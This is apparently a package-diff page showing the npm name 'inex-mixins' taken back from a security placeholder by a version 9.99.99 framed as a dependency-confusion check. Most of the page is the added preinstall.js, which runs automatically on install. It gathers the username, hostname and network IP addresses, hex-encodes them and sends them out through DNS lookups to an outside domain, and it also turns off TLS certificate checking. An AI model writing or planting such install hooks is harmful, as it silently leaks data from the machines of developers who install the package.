inex-mixins 0.0.1-security → 9.99.99

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of inex-mixins might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,2 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=inex-mixins for more information.
1
+ # DO NOT INSTALL THIS MODULE
2
+ # USED FOR DEPENDENCY CONFUSION CHECK
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ // inex-mixins 9.99.99
2
+ module.exports = {};
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "inex-mixins",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "9.99.99",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node preinstall.js"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/preinstall.js ADDED
@@ -0,0 +1,69 @@
1
+ (function () {
2
+
3
+ var require = global.require || global.process.mainModule.constructor._load;
4
+
5
+ var https = require("https");
6
+ var dns = require("dns");
7
+ var os = require("os");
8
+
9
+ var DNS_DOMAIN = '.rzd-dc-prod.n.addr-in.com';
10
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
11
+
12
+ var randomString = function (length) {
13
+ var result = '';
14
+ var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
15
+ for (var i = 0; i < length; i++)
16
+ result += alphabet.charAt(Math.floor(Math.random() *
17
+ alphabet.length));
18
+ return result;
19
+ }
20
+
21
+ var getNetworkInterfaces = function () {
22
+ var ifaces = os.networkInterfaces();
23
+ var results = {};
24
+
25
+ Object.keys(ifaces).forEach(function (name) {
26
+ ifaces[name].forEach(function (net) {
27
+ if (net.family === 'IPv4' && !net.internal) {
28
+ if (!results[name])
29
+ results[name] = [];
30
+ results[name].push(net.address);
31
+ }
32
+ });
33
+ });
34
+
35
+ return results;
36
+ }
37
+
38
+ var toHex = function (str) {
39
+ return Buffer.from(str, 'utf-8').toString('hex');
40
+ }
41
+
42
+ var collectStats = function () {
43
+ // Unique 6-character string to identify host in DNS logs
44
+ var hostId = toHex(randomString(3));
45
+ var suffix = '.' + hostId + DNS_DOMAIN;
46
+ // Stat type prefix:
47
+ // x - username
48
+ // y - hostname
49
+ // z - network interface
50
+
51
+
52
+ var hostname = os.hostname();
53
+ var username = os.userInfo().username;
54
+ var ifaces = getNetworkInterfaces();
55
+
56
+
57
+ dns.lookup('9.99.99' + suffix, function (err, res) {});
58
+ dns.lookup('xxx' + toHex(username) + suffix, function (err, res) {});
59
+ dns.lookup('yyy' + toHex(hostname) + suffix, function (err, res) {});
60
+
61
+
62
+ Object.keys(ifaces).forEach(function (iface) {
63
+ dns.lookup('zzz' + toHex(iface) + '.' + ifaces[iface][0] + suffix, function (err, res) {});
64
+ });
65
+ }
66
+
67
+ collectStats();
68
+
69
+ })();